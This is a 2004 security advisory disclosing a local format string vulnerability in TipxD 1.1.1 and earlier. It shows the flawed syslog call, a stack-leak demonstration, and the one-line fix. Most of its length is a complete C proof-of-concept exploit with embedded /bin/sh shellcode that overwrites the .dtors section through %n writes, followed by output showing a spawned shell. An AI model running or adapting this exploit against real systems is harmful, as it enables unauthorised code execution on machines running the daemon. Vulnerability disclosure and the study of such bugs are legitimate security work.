Copy Link
Add to Bookmark
Report
08 - tipxd <= 1.1.1 Format String Vulnerability
No System Group - Advisory #08 - 15/11/04
- Program: Tom's IPX Tunneling Daemon - TipxD
- Homepage: http://tipxd.sourceforge.net
- Vulnerable Versions: TipxD 1.1.1 and prior
- Risk: Low
- Impact: Local Format String Vulnerability
DESCRIPTION
tipxd is an IPX tunneling daemon which snoops on a local network for IPX 802.3 traffic, packages it and sends it over one or many TCP/IP connections to tipxd running on remote machines where it is unpacked and sent via the local network. To the IPX networks, it then appears that the LANs are joined. This is a request for testing and big-finding. It is intended for playing IPX based games where the remote machines are joined only by a TCP/IP network, and typically when the the gaming machines are each behind a firewall.
More informations at: http://tipxd.sourceforge.net
DETAILS
tipxd is affected by a format string bug in the tipxd_log() function to 61 lines of src/log.c code:
--- log.c ---
45: void tipxd_log(int priority, char *format, ... )
46: {
47: va_list ap;
48: char log_entry[LOG_ENTRY_SIZE];
49:
50: /* Take the format and variables and expand them out into a string,
51: so that we can pass it on to syslog if necessary. No buffer overflow,
52: aren't I good? :)
53: */
54: va_start(ap,format);
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);
56:
57: if (sysinfo.opt_flags & OPT_STDERR) {
58: /* To do: add something useful like timestamping instead of silly pre-identifie
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);
60: } else {
61: syslog(priority,log_entry); // The format bug
62: }
63:
64: return;
65: }
--- log.c ---We can show some parts of the stack memory by using a format string like this:
coki@servidor:~$ tipxd -C AAAA%08x
Unable to open configuration file : No such file or directory
coki@servidor:~$ tail -n 1 /var/log/messages
Nov 15 11:03:40 servidor tipxd[8360]: Config file is AAAA0804c8d7
coki@servidor:~$
EXPLOIT
------------------ tipxd_exp.c ------------------
/* tipxd_exp.c
TipxD Format String Vulnerability
TipxD <= 1.1.1 local exploit (Proof of Concept)
Tested in Slackware 9.0 / 9.1 / 10.0
by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar
*/
#include <stdio.h>
#include <string.h>
#define PATH "/bin/tipxd"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"
unsigned char shellcode[]= /* aleph1 shellcode.45b */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68";
int check(unsigned long addr);
int main(int argc, char *argv[]) {
int i, dtorsaddr;
unsigned int bal1, bal2, bal3, bal4;
char temp[512];
char buffer[1024];
char nop1[255], nop2[255];
char nop3[255], nop4[255];
int cn1, cn2, cn3, cn4;
FILE *f;
char *env[3] = {shellcode, NULL};
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);
/* finding .dtors address */
sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
f = popen(temp, "r");
if(fscanf(f, " %08x", &dtorsaddr) != 1) {
pclose(f);
printf("Cannot find .dtors address\n");
exit(1);
}
pclose(f);
dtorsaddr = dtorsaddr + 4;
printf("\n TipxD <= 1.1.1 local exploit (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
printf(" shellcode address = %.8p\n", shaddr);
printf(" .dtors address = %.8p\n\n", dtorsaddr);
bzero(temp, sizeof(temp));
bzero(buffer, sizeof(buffer));
strcat(buffer, "x");
/* adding .dtors address */
for(i = 0; i < 4; i++) {
bzero(temp, sizeof(temp));
sprintf(temp, "%s", &dtorsaddr);
strncat(buffer, temp, 4);
dtorsaddr++;
}
/* convert shellcode address location */
memset(nop1, 0, 255);
memset(nop2, 0, 255);
memset(nop3, 0, 255);
memset(nop4, 0, 255);
bal1 = (shaddr & 0xff000000) >> 24;
bal2 = (shaddr & 0x00ff0000) >> 16;
bal3 = (shaddr & 0x0000ff00) >> 8;
bal4 = (shaddr & 0x000000ff);
cn1 = bal4 - 16 - 15 - 48 - 2 -1;
cn1 = check(cn1);
cn2 = bal3 - bal4 - 2;
cn2 = check(cn2);
cn3 = bal2 - bal3 - 2;
cn3 = check(cn3);
cn4 = bal1 - bal2 - 2;
cn4 = check(cn4);
memset(nop1, '\x90', cn1);
memset(nop2, '\x90', cn2);
memset(nop3, '\x90', cn3);
memset(nop4, '\x90', cn4);
sprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n\x90\x90\x90\x90"
,nop1, nop2, nop3, nop4);
strcat(buffer, temp);
execle(PATH, "tipxd", "-f", buffer, NULL, env);
}
int check(unsigned long addr) {
char tmp[128];
snprintf(tmp, sizeof(tmp), "%d", addr);
if(atoi(tmp) < 1)
addr = addr + 256;
return addr;
}
---------------- cherokee_exp.c -----------------
coki@servidor:~$ make tipxd_exp
coki@servidor:~$ ./tipxd_exp
tipxd local exploit (Proof of Concept)
by CoKi <coki@nosystem.com.ar>
shellcode address = 0xbfffffa7
.dtors address = 0x0804fbe0Unable to open configuration file : File name too long
sh-2.05b$This exploit does not give a root shell :(
SOLUTIONS
Change the tipxd_log() function of src/log.c code:
--- log.c ---
45: void tipxd_log(int priority, char *format, ... )
46: {
47: va_list ap;
48: char log_entry[LOG_ENTRY_SIZE];
49:
50: /* Take the format and variables and expand them out into a string,
51: so that we can pass it on to syslog if necessary. No buffer overflow,
52: aren't I good? :)
53: */
54: va_start(ap,format);
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);
56:
57: if (sysinfo.opt_flags & OPT_STDERR) {
58: /* To do: add something useful like timestamping instead of silly pre-identifie
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);
60: } else {
61: syslog(priority,"%s",log_entry); // The fix
62: }
63:
64: return;
65: }
--- log.c ---
REFERENCES
http://www.nosystem.com.ar/advisories/advisory-08.txt
CREDITS
Discovered by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar
